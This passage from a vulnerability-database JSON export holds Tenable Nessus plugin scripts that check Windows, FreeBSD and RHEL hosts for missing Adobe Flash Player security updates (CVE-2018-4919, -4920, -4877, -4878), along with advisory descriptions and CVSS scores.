"href": "https://www.tenable.com/plugins/nessus/108287", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108287);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n script_bugtraq_id(103383, 103385);\n script_xref(name:\"MSKB\", value:\"4088785\");\n script_xref(name:\"MSFT\", value:\"MS18-4088785\");\n\n script_name(english:\"KB4088785: Security update for Adobe Flash Player (March 2018)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4088785. It is,\ntherefore, affected by multiple remote code execution vulnerabilities\nin Adobe Flash Player.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # https://support.microsoft.com/en-us/help/4088785/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?277368d9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4088785 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-03\";\nkbs = make_list('4088785');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 28.0.0.161\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"28.0.0.161\", strict:FALSE) <= 0)\n fix = \"29.0.0.113\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_add_report(bulletin:'MS18-03', kb:'4088785', report);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report());\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:43:20", "description": "Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead to remote code execution (CVE-2018-4919).\n\n- This update resolves a type confusion vulnerability that could lead to remote code execution (CVE-2018-4920).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-14T00:00:00", "type": "nessus", "title": "FreeBSD : Flash Player -- multiple vulnerabilities (313078e3-26e2-11e8-9920-6451062f0f7a)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2022-11-21T00:00:00", "cpe": ["cpe:2.3:o:freebsd:freebsd:*:*:*:*:*:*:*:*", "p-cpe:2.3:a:freebsd:freebsd:linux-flashplayer:*:*:*:*:*:*:*"], "id": "FREEBSD_PKG_313078E326E211E899206451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/108314", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2022 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108314);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/21\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"FreeBSD : Flash Player -- multiple vulnerabilities (313078e3-26e2-11e8-9920-6451062f0f7a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead\nto remote code execution (CVE-2018-4919).\n\n- This update resolves a type confusion vulnerability that could lead\nto remote code execution (CVE-2018-4920).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\"\n );\n # https://vuxml.freebsd.org/freebsd/313078e3-26e2-11e8-9920-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f0ef0bb8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<29.0.0.113\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:25", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es) :\n\n* flash-plugin: Use After Free - remote code execution vulnerability (APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability (APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-15T00:00:00", "type": "nessus", "title": "RHEL 6 : flash-plugin (RHSA-2018:0520)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2022-01-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0520.NASL", "href": "https://www.tenable.com/plugins/nessus/108361", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0520. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108361);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/28\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n script_xref(name:\"RHSA\", value:\"2018:0520\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2018:0520)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 29.0.0.113.\n\nSecurity Fix(es) :\n\n* flash-plugin: Use After Free - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4919)\n\n* flash-plugin: Type Confusion - remote code execution vulnerability\n(APSB18-05) (CVE-2018-4920)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0520\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-4920\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0520\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-29.0.0.113-1.el6_9\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:42:25", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 28.0.0.161. It is therefore affected by multiple vulnerabilities.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-03-13T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 28.0.0.161 (APSB18-05)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4919", "CVE-2018-4920"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB18-05.NASL", "href": "https://www.tenable.com/plugins/nessus/108281", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108281);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-4919\", \"CVE-2018-4920\");\n\n script_name(english:\"Adobe Flash Player <= 28.0.0.161 (APSB18-05)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows\nhost is equal or prior to version 28.0.0.161. It is therefore \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb18-05.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 29.0.0.113 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4920\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # <= 28.0.0.161\n if (ver_compare(ver:ver,fix:\"28.0.0.161\",strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"29.0.0.113\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"29.0.0.113\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 29.0.0.113\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 29.0.0.113 (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:39:55", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 28.0.0.137. It is, therefore, affected by a use-after-free vulnerability that allows arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-05T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4877", "CVE-2018-4878"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA18-01.NASL", "href": "https://www.tenable.com/plugins/nessus/106606", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106606);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-4877\", \"CVE-2018-4878\");\n script_bugtraq_id(102893, 102930);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Adobe Flash Player <= 28.0.0.137 Use-after-free Remote Code Execution (APSA18-01) (APSB18-03)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 28.0.0.137. It is, therefore, affected by\na use-after-free vulnerability that allows arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", 